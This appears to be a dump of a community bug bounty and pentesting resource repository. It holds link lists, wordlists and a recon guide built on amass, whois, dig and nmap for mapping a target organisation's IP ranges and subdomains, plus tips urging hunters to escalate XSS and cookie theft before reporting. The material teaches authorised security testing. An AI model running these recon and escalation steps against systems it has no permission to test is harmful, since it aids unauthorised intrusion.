Repository: RESETHACKER-COMMUNITY/Pentesting-Bugbounty
Branch: main
Commit: 59cac7d23fab
Files: 94
Total size: 831.1 KB

Directory structure:
gitextract_93rjh7w1/

├── .github/
│   └── FUNDING.yml
├── .pdfs/
│   ├── INDEX
│   ├── PT-V1.1.xmind
│   └── web app penetration testing list.xlsx
├── API-HelpDesk/
│   └── Readme.md
├── Bugbounty/
│   ├── BB-FAQ/
│   │   ├── BB_FAQ.md
│   │   ├── Domain-Information.md
│   │   └── Readme.md
│   ├── BBMindmap/
│   │   └── Readme.md
│   ├── Readme.md
│   ├── Table_of_Vulnerability.md
│   ├── Website_inputs_testing.md
│   ├── Wordlists/
│   │   ├── AllWordlists.md
│   │   └── Readme.md
│   ├── Wordlists.md
│   ├── bugbounty-FAQ.md
│   └── burpsuite.md
├── Burpsuite/
│   ├── Assets/
│   │   └── Readme.md
│   ├── Readme.md
│   └── protips.md
├── CONTRIBUTING.md
├── Contributors.md
├── CyberSecurityJobs/
│   ├── Careers
│   ├── CoverLetter.md
│   ├── CybersecuityDiscipline.md
│   ├── For_Jobs.md
│   ├── Intership_Advice.md
│   ├── InterviewQA.md
│   ├── Jobs.md
│   ├── Readme.md
│   ├── SalaryNegotiation.md
│   ├── internships.md
│   └── resume.md
├── ISO-HelpDesk/
│   └── Readme.md
├── LFI/
│   ├── Lfi.md
│   ├── Lfitools.md
│   └── Readme.md
├── Pentesting Cheatsheets/
│   ├── Readme.md
│   └── cheetsheets.md
├── Pentesting-BugbountyINDEX.md
├── PentestingChecklist/
│   └── Readme.md
├── PentestingReports/
│   ├── PreEngagement.md
│   ├── Readme.md
│   └── pentestingvideos.md
├── Pentesting_for_Researchers/
│   ├── PTplatform.md
│   ├── Pentest-Reports.md
│   └── Readme.md
├── README.md
├── ResetCybersecuirty/
│   ├── CONTRIBUTING.md
│   ├── CVE's/
│   │   ├── CVE_Assests/
│   │   │   ├── Beta.md
│   │   │   └── Readme.md
│   │   ├── POC_collecctions.md
│   │   └── Readme.md
│   ├── Readme.md
│   ├── SupportedBy/
│   │   ├── CommunityEngagementPartners.md
│   │   ├── SponserUs.md
│   │   ├── Suggestions.md
│   │   ├── Team&Contributors.md
│   │   └── Understanding.md
│   ├── WIUAsset/
│   │   ├── Contribute.md
│   │   ├── Logs.md
│   │   ├── Readme.md
│   │   ├── WIU_Templete/
│   │   │   ├── WIU_Trail_Beginners.md
│   │   │   ├── WIU_Trail_For_Professionals.md
│   │   │   ├── WIU_v0.3.md
│   │   │   ├── WIU_v0.4.md
│   │   │   └── helpdesk-Github.md
│   │   └── Weekly_Infosec_Update_Segment/
│   │       ├── Course_Review/
│   │       │   ├── CEH.md
│   │       │   └── Readme.md
│   │       ├── Future_updates.md
│   │       ├── Readme.md
│   │       └── Tools/
│   │           └── Readme.md
│   ├── Weekly_Infosec_Update(WIU)/
│   │   ├── Weekly_Infosec_Update_00.md
│   │   ├── Weekly_Infosec_Update_01.md
│   │   ├── Weekly_Infosec_Update_02.md
│   │   ├── Weekly_Infosec_Update_03.md
│   │   ├── Weekly_Infosec_Update_04.md
│   │   ├── Weekly_Infosec_Update_05.md
│   │   ├── Weekly_Infosec_Update_06.md
│   │   ├── Weekly_Infosec_Update_07.md
│   │   ├── Weekly_Infosec_Update_08.md
│   │   ├── Weekly_Infosec_Update_09.md
│   │   ├── Weekly_Infosec_Update_10.md
│   │   ├── Weekly_Infosec_Update_11.md
│   │   └── Weekly_Infosec_Update_12.md
│   └── code-of-conduct.md
├── Sqlinjection.md
├── cheetsheets/
│   ├── BurpSuiteCheetsheet.md
│   ├── Nano.md
│   ├── Readme.md
│   ├── metasploitcheetsheet.md
│   └── nmapcheetsheet.md
├── enterprises.md
└── license

================================================
FILE CONTENTS
================================================

================================================
FILE: .github/FUNDING.yml
================================================
# These are supported funding model platforms

custom: https://paypal.me/Vicky481




================================================
FILE: .pdfs/INDEX
================================================
** ** [Resources Mindmap](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/ResourcesMindmap.md)
/Resources/blob/main/Writeups/Create.md

RESOURCES:(Readme.md)

1. Conferences > Readme.md (Conferences around the world)
2. Setup  > Readme.md (SetupHelpDesk(Under Development))
3. Writeups > Readme.md (/BugBounty Basic -BBb_00, BugBounty Let's Hunt - BBh_01 & Bugbounty Hunters - BB_Hunter)
      
      BBbasics.md
      BBIntermidiate.md
      BBHunter.md
      CmsServerDatabase.md 
      Create.md
      javascript.md

4. Bugbountycheetsheet > Readme.md
      bugbountyplatform.md

5. Bugbounty > Readme.md  
             > 0AuthMisconfiguration.md
             
      XSS

          1  XSS Documentation
          2  XSS Practice labs
          3  XSS Disclosure/Reports/POC
          4  XSS Mindmap
          5  XSS Tools
          6  XSS Ebooks
          7  XSS Researchers
          8  XSS CVE

      SSO

          1  SSO Documentation
          2  SSO Practice labs
          3  SSO Disclosure/Reports/POC
          4  SSO Mindmap
          5  SSO Tools
          6  SSO Ebooks
          7  SSO Researchers
          8  SSO CVE

6. BB_Setup in WSL2 > README.md 
                    > BB_Setup.sh  
                    > WSL2.md
           
7. Getting_Started_with_Cybersecurity 
8. Ebooks.md
9. ResoursesMindmap.md



================================================
FILE: API-HelpDesk/Readme.md
================================================
# Here are 23 free ways to learn about API security testing, by Hany Soliman

1. Video: Traceable AI, API Hacking 101.
2. Video: Katie Paxton-Fear, API Hacking.
3. Video: Bugcrowd, Bad API, hAPI Hackers.
4. Video: OWASP API Security Top 10 Webinar.
5. Blog: Detectify, How To Hack API's in 2021.
6. Blog: HackXpert, Let's build an API to hack.
7. Video: Bugcrowd, API Security 101 by Sadako.
8. Video: David Bombal, Free API Hacking Course.
9. Blog: Wallarm, How To Hack API In 60 Minutes.
10. Website: APIsecurity IO, API Security Articles.
11. Blog: Curity, The API Security Maturity Model.
12. Blog: Expedited Security, API Security MegaGuide.
13. Video: Grant Ongers, API Security Testing Workshop.
14. Videos: The XSS Rat, API Testing And Securing Guide.
15. Blog: APIsec OWASP API Security Top 10: A Deep Dive.
16. Podcast: We Hack Purple, API Security Best Practices.
17. Blog: Kontra Application Security, Owasp Top 10 for API.
18. Blog: Secure Delivery, OWASP API Top 10 CTF Walk-through.
19. Blog: SmartBear, How To Hack An API And Get Away With It.
20. Blog: Ping Identity, API Security: The Complete Guide 2022.
21. Video: SANS Offensive Operations, Analyzing OWASP API Security.
22. Blog: Bend Theory, Exploiting Unintended Functionality in API's.
23. Blog: Bright Security, Complete Guide to Threats, Methods & Tools.

- https://github.com/shieldfy/API-Security-Checklist


================================================
FILE: Bugbounty/BB-FAQ/BB_FAQ.md
================================================
# BUG BOUNTY FAQ - frequently asked questions (Beginner friendly - Under Development)
Note: Contents inside the **RESETHACKER Community** are to help our community members and content belongs to respective Authors and RESETHACKER Team.

BugBounty FAQ   | Title
-- | --
**0** Getting Started in Cybersecurity Advice | [Be-a-hacker and breaking cybersecurity successfully](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/Getting_Started_with_Cybersecurity.md)
**0** Bugbounty FAQ - Imran parray | [General questions asked by people](https://github.com/imran-parray/General-Notes)
**0** Bugbounty Setup HelpDesk | [Got stuck during setup? We have a solution for you](https://github.com/RESETHACKER-COMMUNITY/Resources/tree/main/setup)
**0** Job/Internship/Resume HelpDesk | [Find cybersecurity jobs/interviews, advice to get jobs, crack interviews, etc.](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Readme.md)
**0** Stay up to date with conferences | [Track all the upcoming conferences](https://github.com/RESETHACKER-COMMUNITY/Resources/tree/main/Conference)
**0** Track the latest rewards, CVEs, writeups, tools, reports, disclosures and ongoing trends in the community | [Resources to keep up with the cybersecurity community](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md)
**0** Build with community | [Create, Build and Automate for personal use](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/Writeups/Create.md)


================================================
FILE: Bugbounty/BB-FAQ/Domain-Information.md
================================================
## Domain Information:

- Find acquisitions (Google 6-month rule), ASNs, reverse whois (identifying IPs and main TLDs)

		Example: List_of_mergers_and_acquisitions_by_COMPANYNAME
		https://en.wikipedia.org/wiki/List_of_mergers_and_acquisitions_by_Alphabet
		https://en.wikipedia.org/wiki/List_of_mergers_and_acquisitions_by_Meta_Platforms

		- Search, e.g.:
		responsible disclosure 2022
		Company responsible disclosure
		Or check out the keywords suggested by bug hunters or search engines.

		- Go to a bug bounty platform and filter for newly listed programs manually.
		- Third-party websites such as Crunchbase can be helpful as well.


- To check the ASN of a domain's IP (ASN number, e.g. AS714), visit:

	https://bgp.he.net or ASN Tool - MxToolBox

	- An Autonomous System Number (ASN) is a way to represent a collection of IPs and who owns them.
	- The IP address pool is spread across five Regional Internet Registries (RIRs): AFRINIC, APNIC, ARIN, LACNIC, and RIPE NCC.
	- The providers then allocate IP ranges to different organizations.
	- If a company wishes to buy a block of IP addresses, they must purchase it from one of these providers.
	
- To check the CIDR range, e.g. 31.13.55.0/24:

	- A Classless Inter-Domain Routing (CIDR) range is a short way of representing a group of IP addresses.
	- Compromising a server hosted on a company’s CIDR range may lead you directly into their internal network.

	- Use https://mxtoolbox.com/asn.aspx to find a company’s ASN as well as its corresponding CIDR ranges. Note that small organizations won’t have a dedicated CIDR range; they normally use third-party cloud vendors such as AWS and Rackspace, or they host their assets under an internet service provider (ISP) IP. Large companies, however, tend to have their own CIDR range, and we can use this information to target machines hosted there.

	- Amass tool: to find domains on a given CIDR range.
			amass intel -cidr 31.13.55.0/24
	
		
- Reverse Whois: to find assets owned by an organization or person.

	- There are several online sources that constantly monitor and scrape the whois database for analysis. We can use these services to find domains that are owned by the same organization.
	Reverse Whois Lookup - ViewDNS.info


- WHOIS: (domain owners from ASN number)
	- Searching the whois database, we can find all domains registered by the email “*.example.com”. Some people use whois guard to hide this information, but many companies forget to enable it.

		whois -h whois.radb.net -- '-i origin AS714' | grep -Eo "([0-9.]+){4}/[0-9]+" | uniq
		OR
		whois -h whois.radb.net -- '-i origin ' | grep -Eo "([0-9.]+){4}/[0-9]+" | sort -u

		Try command: host example.com or dig example.com or ping example.com (to get the IP address)
		
- DNS Information
	- Without the Domain Name System (DNS) you wouldn't be able to correlate domains to IPs.
	- DNS records contain several bits of information that can be used to correlate domains to one another.

	- The A, NS, and MX records are the most popular ways to find domains that are likely to be owned by the same person.

	- Try command: dig example.com (gives you the CNAME; use it to check for subdomain takeover with the help of https://github.com/EdOverflow/can-i-take-over-xyz)
		We can also see that the domain points to the CNAME page “anything.organization.com”; if we can register this domain, we win.
	- NOTE that the organization could be GitHub, Cloudflare, AWS, etc.

- Reverse DNS:
	
	- If domains share the same A, NS, or MX record then it is possible they are owned by the same person. 
	- We can use reverse IP, reverse name server, and reverse mail server searches to find these domains.
	- There may be some false positives but these can be filtered out. 
	
	- This technique will greatly increase your scope as a bug bounty hunter.


- Name server:
	- Large companies often host their own name servers so they can route traffic to the correct IPs.
	- These servers are configured by the organization that owns them, so it stands to reason that Microsoft wouldn’t have domains pointing to a Facebook name server.

	nslookup -type=NS example.com

	- Reverse name server:

		To check which domains point to a given name server:
	 	● https://domaineye.com
		Hundreds of thousands of domains point to GoDaddy name servers, so you may have a few false positives in there.


	- Reverse mail server:

		The MX record returned must be owned by the target organization.
		To perform a reverse mail server search:
	 	● https://domaineye.com

		nslookup -type=MX example.com
	
- Reverse IP
	- Utilizing the company's CIDR ranges, we can perform a reverse IP search to find any
	domains that are hosted on those IPs. Some people also use the A record of
	their target domain to perform a reverse IP search. Again, you can use
	https://domaineye.com/



---
What we have learned so far:

## Finding acquisitions: the idea is to find more IPs/domains related to the target.

	Get IP: ping xyz.com or dig xyz.com or host xyz.com
	Check ASN
	Check CIDR range
	WHOIS: (domains owned by the same organization or company)
	Reverse Whois
	DNS Information
	Reverse DNS
	Reverse Name server
	Reverse Mail server
	Reverse IP
	Favicon hashing

- Note:
	1. Get the ASN from the IP > get the CIDR range and save it to IP.TXT

	2. whois -h whois.radb.net -- '-i origin AS714' | grep -Eo "([0-9.]+){4}/[0-9]+" | sort -u > IP.TXT
	Run Nmap: nmap -iL IP.TXT

	3. Collect subdomains and check the CNAME of all the subdomains with a single command.


### Tool recommended: Amass for asset discovery
- Amass to find the ASN
		amass intel -org example.com
- Amass to list domains running on a given ASN
		amass intel -asn AS714
- To find domains on a given CIDR range
		amass intel -cidr 31.13.55.0/24
- Utilize reverse whois searches to find other domains purchased by the same user
		amass intel -whois -d example.com
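
The `grep -Eo "([0-9.]+){4}/[0-9]+"` filter used in the whois commands above accepts any run of digits and dots, so malformed entries and addresses quoted in free-text fields end up in the CIDR list. The following is an added example, not part of the original repository: a stricter filter that keeps only well-formed IPv4 prefixes from `route:` lines, as you would want when inventorying your own organization's announced ranges. The function names, AS64500 and the sample output are constructed (documentation ranges only).

```shell
#!/bin/sh
# Added example: strict extraction of IPv4 prefixes from RADB-style whois output.

# Constructed sample of what `whois -h whois.radb.net -- '-i origin AS64500'`
# could return. AS64500 and all addresses are reserved documentation values.
sample_radb_output() {
cat <<'EOF'
route:      192.0.2.0/24
descr:      Example Org block A
origin:     AS64500
changed:    noc@example.com 20220101

route:      198.51.100.0/24
origin:     AS64500

route:      192.0.2.0/24
descr:      duplicate registration of block A
origin:     AS64500

route6:     2001:db8::/32
origin:     AS64500

route:      203.0.113.999/24
remarks:    malformed on purpose; 1.2.3.4/24 in free text must be ignored
origin:     AS64500
EOF
}

# Read whois output on stdin and print each valid IPv4 CIDR once,
# in the order first seen. Only "route:" attributes are considered,
# so route6 objects and free-text fields are skipped.
extract_cidrs() {
  awk '
    $1 == "route:" {
      # Expect exactly address/prefix-length.
      if (split($2, p, "/") != 2) next
      if (p[2] !~ /^[0-9]+$/ || p[2] + 0 > 32) next
      # Expect exactly four decimal octets, each 0-255.
      if (split(p[1], o, ".") != 4) next
      ok = 1
      for (i = 1; i <= 4; i++)
        if (o[i] !~ /^[0-9]+$/ || o[i] + 0 > 255) ok = 0
      # De-duplicate without needing sorted input (unlike plain uniq).
      if (ok && !seen[$2]++) print $2
    }
  '
}

# Demo run on the constructed sample.
sample_radb_output | extract_cidrs
```

On live output, pipe the whois command into `extract_cidrs` in place of the `grep | uniq` stage.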



================================================
FILE: Bugbounty/BB-FAQ/Readme.md
================================================
##### For every bug bounty hunter, keep these things in mind when you are reporting any vulnerability

1. The report should have all the necessary details, including the vulnerable URL (most important), reproduction steps, PoC, impact and, if possible, mitigation steps.

2. When you are explaining the impact of a vulnerability, don’t just tell them "I can steal the session cookie and do an account takeover"; try to do it and then report it. Reporting anything and asking for a bounty or hall of fame is not worth it at all.

3. This is for the XSS guys: after finding a popup, don’t report it yet; try further exploitation and increase your impact.

4. Report multiple vulnerabilities to a company and then approach them to get their VAPT done by you; it will help you in the future.

5. Understand what’s critical for a company and focus on those types of bugs when you are hunting. Trust me, it will save you time, and you won’t get demotivated after seeing a triager reply that your bugs are not applicable, etc.


================================================
FILE: Bugbounty/BBMindmap/Readme.md
================================================
## This folder contains multiple Bugbounty Mindmaps curated by all the amazing bughunters.
Use it as inspiration for creating your own web pentest / bug bounty recon and hunting workflow.

- [How Does Mind Mapping Help for Better Bug Bounty](https://www.xmind.net/blog/en/how-does-mind-mapping-help-for-better-bug-bounty/)


- [*Compilation of recon workflows by pentester land](https://pentester.land/cheatsheets/2019/03/25/compilation-of-recon-workflows.html)
- [*Bugbounty-hunter - Collection of Mindmaps for Bugbounty](https://gowthams.gitbook.io/bughunter-handbook/mindmaps)
- [Collection of Mind-Maps of Several Things - forked from Imran-parray](https://github.com/RESETHACKER-COMMUNITY/Mind-Maps)

- [Dsopas - BB approach](https://github.com/dsopas/assessment-mindset)
- [Iamfrogy - BB approach](https://drive.google.com/drive/folders/15jbRQHhFPjx8oUbP1nPCtm2L-vB11Zew?usp=sharing)
- [ITSecurityguard - BB approach](https://drive.google.com/drive/folders/15jbRQHhFPjx8oUbP1nPCtm2L-vB11Zew?usp=sharing)
- [Ahmad Halabi - BB approach](https://drive.google.com/drive/folders/15jbRQHhFPjx8oUbP1nPCtm2L-vB11Zew?usp=sharing)
- [AjitYadav - web hacking & BB](https://ajityadav.net/assets/images/WH-Recon-BBB-Chapter5-Full.png)
- [Rohit gautam - BB Tools for Vulnerability](https://drive.google.com/drive/folders/15jbRQHhFPjx8oUbP1nPCtm2L-vB11Zew?usp=sharing)


================================================
FILE: Bugbounty/Readme.md
================================================
# Bug Bounty Helpdesk (Under Development)

  > Note: Contents inside the **RESETHACKER Community** are to help our community members and content belongs to respective Authors and RESETHACKER Team.

BugBounty HelpDesk  | Title
-- | --
**0** Bug bounty FAQ | [Friendly Q/A](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Bugbounty/bugbounty-FAQ.md)
**0** ResetHacker - Setup HelpDesk | [Pentesting/Bug Bounty/DevSecOps setups in Windows, Linux, Docker and VPS (AWS, Azure, GCP, etc.)](https://github.com/RESETHACKER-COMMUNITY/Resources/tree/main/setup)
**0** Ignitetechnologies & ResetHacker | [Burp Suite for Pentester and cheatsheet to hunt the vulnerabilities](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Bugbounty/burpsuite.md)
**0** Harsh-Bothra | [Learn 365 Challenge for Beginners/Intermediate - Take it as a reference to challenge yourself](https://github.com/harsh-bothra/learn365)
**0** hakluke | [Bug-bounty-standards - A list of edge cases that occur in bug bounty programs, conversations on how they should be handled.](https://github.com/hakluke/bug-bounty-standards)
**0** Cipher387 | [Dork collections for different search engines](https://github.com/cipher387/Dorks-collections-list)
**0** Luke Stephens | [How to Regex: A Practical Guide to Regular Expressions (Regex) for Hackers](https://www.bugcrowd.com/blog/how-to-regex-a-practical-guide-to-regular-expressions-regex-for-hackers/)
**0** Streaak | [Got an API use Keyhacks](https://github.com/streaak/keyhacks)
**0** Vikram | [JavaScript - Content discovery](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/Writeups/javascript.md)
**0** Wordlists | [All Wordlists at one place](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Bugbounty/Wordlists/AllWordlists.md)
**0** Bug bounty writeups  | [Vulnerability based write ups at one place](https://github.com/alexbieber/Bug_Bounty_writeups)
**0** Bug Bounty Mind-Map collection | [Bugbounty Mindmap curated by all the amazing bughunters.](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/tree/main/Bugbounty/BBMindmap)
**0** Public Bug bounty | [Collection of public Bugbounty program](https://github.com/resethacker/public-bugbounty-programs)
**0** StayUpToDate | [Latest rewards, CVEs, writeups, tools, reports, disclosures and ongoing trends in the community.](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md)

BugBounty HelpDesk  | Title
-- | --
**1** HackTricks | [Pentesting & bugbounty Methodology](https://book.hacktricks.xyz/pentesting-methodology)
**2** Six2dez | [Web-checklist](https://six2dez.gitbook.io/pentest-book/others/web-checklist)
**3** gowthams | [Help bug bounty hunters with resources](https://gowthams.gitbook.io/bughunter-handbook/bugbounty-short-write-ups)
**4** The Web Application Security Consortium | [The WASC Threat Classification v2.0](http://projects.webappsec.org/w/page/13246978/Threat-Classification)
**5** kathan19 | [HowToHunt](https://kathan19.gitbook.io/howtohunt/)  
**6** Ninad Mathpati | [Securityboat](https://workbook.securityboat.in/)
**7** Book of Bug Bounty Tips | [Collection of "BugBounty" Tips tweeted / shared by community people.](https://gowsundar.gitbook.io/book-of-bugbounty-tips/)
**8** EdOverflow | [Cheatsheets and Must checkout for subdomains Takeover](https://github.com/EdOverflow/bugbounty-cheatsheet)
**9** Harsh-Bothra | [Security Explained - Highly recommended to understand vulnerable code files](https://github.com/harsh-bothra/SecurityExplained/tree/main/resources)
**10** Security protection | [Curated lists of tools, tips and resources for protecting digital security and privacy](https://security-list.js.org/#/)
**11** Offensive Security Cheatsheet | [Web Pentesting and bug bounty](https://cheatsheet.haax.fr/web-pentest/bug_bounty_tips/)
**12** @zapstiko | [Curated bug bounty resources from Twitter](https://github.com/zapstiko/Bug-Bounty)
**13** AllVideoPocsFromHackerOne | [TOP 20 Weakness from HackerOne disclosed Reports](https://github.com/zeroc00I/AllVideoPocsFromHackerOne)

## Getting started with BugBounty - Under development
1. [Resources for getting started with BugBounty - BBb_00](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/Writeups/BBbasics.md)
2. [Resources for Web Pentesting: Let's Hunt - BBh_01 - under development](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/Writeups/BBintermediate.md)

This contains the detailed resources for people getting started with BugBounty.

Index | [BugBounty Basic -BBb_00 ](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/Writeups/BBbasics.md)
--- | ---
**1** | Linux Distributions
**2** | Basic Understanding the web application before you start Hunting
**3** | Learning resources
**4** | Paid Certifications / courses
**5** | Bug Bounty platforms offers Bounty
**6** | Practice platform
**7** | [Talks - Bug Bounty]
**8** | [Pentesting & Bug Hunting Resources - How to Start?]
**9** | [Bug reports]
**10** | [Vulnerability Assessment and one liners]
**11** | [Bug hunting Reconnaissance writeups]
**12** | [Tools for bug bounty]
**13** | [Ebooks]
**14** | [Misc]

This contains the detailed resources for people **already doing BugBounty**.

Index | [Web pentesting : Let's Hunt - BBh_01 - Under development](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/Writeups/BBintermediate.md)
--- | ---
**1** | [Pentesting Reports/Disclosures ]
**2** | [Web Pentesting MindMaps]
**3** | [Web security Testing Writeups]
**4** | [Bugbounty Reports/Disclosures ]
**5** | [Bugbounty Methodology/Reconnaissance]





================================================
FILE: Bugbounty/Table_of_Vulnerability.md
================================================
**Writeups**: Vulnerability cheatsheets
This file contains detailed writeups on cheatsheets, reports, disclosures, etc. - Updating Soon

## Reference:
- [imran-parray](https://github.com/imran-parray/Web-Sec-CheatSheet)



# Table of Vulnerability

Index | [BugBounty Let's Hunt - BBh_01 ](/Writeups/BBintermediate.md)
--- | ---
**1** | [XSS](/XXS/Readme.md)
**2** | [SQL injection](Sqlinjection.md)
**3** | [LFI](LFI/Readme.md)
**4** | [Business logic Attacks by Dheerajmadhukar](https://github.com/Dheerajmadhukar/notes/tree/main/BugBounty/Business_Logic_Attacks)
**x** | [Captcha Bypass]()
**x** | [Clickjacking]()
**x** | [Client Side Template Injection - CSTI]()
**x** | [Command Injection]()
**x** | [Content Security Policy - CSP Bypass]()
**x** | [Cookies Hacking]()
**x** | [CORS - Misconfigurations & Bypass]()
**x** | [CRLF Injection]()
**x** | [CSRF (Cross Site Request Forgery)]()
**x** | [Dangling Markup - HTML scriptless injection]()
**x** | [Deserialization]()
**x** | [Email Header Injection]()
**x** | [File Inclusion]()
**x** | [File Upload]()
**x** | [IDOR]()
**x** | [JWT Vulnerabilities]()
**x** | [LDAP Injection]()
**x** | [NoSQL Injection]()
**x** | [Open Redirect]()
**x** | [Race Condition]()
**x** | [SSRF (Server Side Request Forgery)]()
**x** | [SSTI (Server Side Template Injection)]()
**x** | [Unicode Normalization vulnerability]()
**x** | [XPATH Injection]()
**x** | [XSLT Server Side Injection]()
**x** | [XXE (XML External Entity)]()
** ** | [OAuth Misconfiguration and bypass]()
** ** | [2FA Misconfiguration & bypass]()
** ** | [MFA Misconfiguration & bypass]()
** ** | [Broken link hijacking Misconfiguration & bypass]()
** ** | [Subdomain Takeover (mainly CNAME) Misconfiguration & bypass]()



          //Index | [Bugbounty Hunters - BB_Hunter](/Writeups/BBHunter.md)
          --- | ---
          Index | [BugBounty Basic -BBb_00 ](/Writeups/BBbasics.md)
          --- | ---//
          
Index | Getting started with Bug bounty & web pentesting
---|---
**0** Pentesterlabs | [Web pentesting part 1](https://pentesterlab.com/exercises/web_for_pentester/course)
**0** Pentesterlabs | [Web pentesting part 2](https://pentesterlab.com/exercises/web_for_pentester_ii/course)
**1** Sanjib Sinha | [Bug Bounty Hunting for Web Security with OWASP Webgoat](https://github.com/Apress/bug-hunting-web-security)




================================================
FILE: Bugbounty/Website_inputs_testing.md
================================================
Index | Topics
---|---
**1** Bozhidar Bozhanov | [User Authentication Best Practices Checklist](https://dzone.com/articles/user-authentication-best-practices-checklist)
**2** Gaurav Bewal | [Registration & Login Page Testing for Developers/Pentesters](https://www.loginradius.com/blog/async/test-cases-for-registration-and-login-page/)






================================================
FILE: Bugbounty/Wordlists/AllWordlists.md
================================================
# Top Recommended wordlists available for red pentesting, bugbounty and password bruteforcing❤️😳 

#### Purpose: This repository is a collection of multiple types of wordlists, gathered in one place from their respective authors and organizations, that can be used during security assessments. Use it to curate your own wordlist as per your requirements.
    
    List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, infrastructure,
    high quality wordlists for content and subdomain discovery, payloads to exploit vulnerabilities and many more.
    
        Wordlists 1
        Payloads and Burpsuite wordlists
        Wordlists 2 
        Password Bruteforce wordlists
        Resources - Video, writeups, tools and reference for wordlists
    

Author | Wordlists 1
-- | --
▫️ | [SecLists - danielmiessler](https://github.com/danielmiessler/SecLists) - Collection of multiple types of lists.
▫️ | [Continuously Updated wordlists for Assets - Assetnote](https://wordlists.assetnote.io/) - High quality wordlists for content and subdomain discovery.
▫️ | [Fuzzdb - fuzzdb-project](http://github.com/fuzzdb-project/fuzzdb) - Dictionary of attack patterns and primitives for black-box application fault injection and resource discovery.
▫️ | [OneListForAll - six2dez](https://github.com/six2dez/OneListForAll) - Rockyou for web fuzzing
▫️ | [Bug-Bounty-Wordlists - Karanxa](https://github.com/Karanxa/Bug-Bounty-Wordlists) - All the important wordlists used while bug hunting.
▫️ | [Webapp-wordlists - p0dalirius](https://github.com/p0dalirius/webapp-wordlists) - Wordlists for each version of common web applications and content management systems (CMS).
▫️ | [random-robbie/bruteforce-lists](https://github.com/random-robbie/bruteforce-lists) - Some files for bruteforcing certain things, including services, servers, databases, etc.

Author | Payloads and Burpsuite wordlists
-- | --
PayloadsAllTheThings - swisskyrepo | [A list of useful payloads and bypass for Web Application Security and Pentest/CTF](https://github.com/swisskyrepo/PayloadsAllTheThings) 
Orwagodfather | [Payloads to exploit web vulnerabilities and different services.](https://github.com/orwagodfather/WordList) 
Fuzz.txt - Bo0oM | [Potentially dangerous files](https://github.com/Bo0oM/fuzz.txt) 
IntruderPayloads - 1N3 | [A collection of Burpsuite Intruder payloads, BurpBounty payloads, fuzz lists, malicious file uploads and web pentesting methodologies and checklists.](https://github.com/1N3/IntruderPayloads) 
Scavenger - wordlist from #burp history | [ Burp extension to create target specific and tailored wordlist from #burp history.](https://github.com/0xDexter0us/Scavenger) 


Author | Wordlists 2
-- | --
Wordsmith - skahwah | [Assist with creating tailored wordlists. This is mostly based on geolocation.](https://github.com/skahwah/wordsmith) 
Betterdefaultpasslist - govolution | [Default password Fuzz for ports and database.](https://github.com/govolution/betterdefaultpasslist) 
Pydictor - LandGrey | [A powerful and useful hacker dictionary builder for a brute-force attack.](https://github.com/LandGrey/pydictor) 
Mentalist - sc0tfree | [A graphical tool for custom wordlist generation. It utilizes common human paradigms for constructing passwords and can output the full wordlist as well as rules compatible with Hashcat and John the Ripper.](https://github.com/sc0tfree/mentalist) 
Basubanakar | [login-panel wordlists ](https://github.com/basubanakar/login-panel-wordlist) 
Skweez | [Spiders web pages and extracts words for #wordlist generation.](https://github.com/edermi/skweez) 


Author | Password Bruteforce wordlists
-- | --
**1** Hashmob | [Largest collection of Password hashes discovered in database breaches(or other sources)](https://hashmob.net/)
**2** passphrase-wordlist - initstring | [Passphrase wordlist and hashcat rules for offline cracking of long, complex passwords](https://github.com/initstring/passphrase-wordlist)
**3** Password-Scripts - laconicwolf | [A collection of scripts that help with different aspects of password cracking, such as wordlist generation, mask analysis, and positional character frequency.](https://github.com/laconicwolf/Password-Scripts)
**4** Pwdb-Public - FlameOfIgnis | [A collection of all the data extracted from 1 billion leaked credentials from internet.](https://github.com/FlameOfIgnis/Pwdb-Public)
**5** Probable-Wordlists - berzerk0 | [Wordlists sorted by probability originally created for password generation and testing - make sure your passwords aren't popular!](https://github.com/berzerk0/Probable-Wordlists)
**6** Brutas-Wordlists and passwords handcrafted with ♥️| [A pretty comprehensive set of password dictionaries and wordlists designed for quick wins in red teaming scenarios or general blackbox pentesting.](https://github.com/tasooshi/brutas)
**7**  COOK | [An overpower wordlist generator, splitter, merger, finder, saver, create words permutation and combinations, apply different encoding/decoding and everything you need.](https://github.com/giteshnxtlvl/cook)
**8** Passphrase-wordlist | [People think they are getting smarter by using passphrases. Let's prove them wrong! This project includes a massive wordlist of phrases (over 20 million) and two hashcat rule files for GPU-based cracking. The rules will create over 1,000 permutations of each phase](https://github.com/initstring/passphrase-wordlist)
**9** Insidetrust  | [Wordlists for creating statistically likely usernames for use in username-enumeration, simulated password-attacks and other security testing tasks.](https://github.com/insidetrust/statistically-likely-usernames) 


Index | Resources - Video, writeups, tools and reference for wordlists
-- | --
**0** Creating Wordlists for Hacking, Pentesting & Bug Bounty Hunting | [Using Seclists, Bigquery, and More!](https://www.youtube.com/watch?v=QGbTaxtEQlg)
**1** Utkusen writeup | [generating-personalized-wordlists - utkusen](https://utkusen.com/blog/generating-personalized-wordlists)
**2** Gotator - Josue87 | [A tool generate DNS wordlists through permutations.](https://github.com/Josue87/gotator) 
**3** CWFF - D4Vinci | [A Tool to Create your Custom Wordlist For Fuzzing](https://github.com/D4Vinci/CWFF) 
**4** Python Code | [CTH wordlists : passwords/keyboard - sorokinpf](https://github.com/sorokinpf/cth_wordlists/tree/master/passwords/keyboard)

Index | More Reference for wordlists
-- | --
**0** Wordlists for everything | [Infosec Wordlists](https://github.com/xajkep/wordlists)
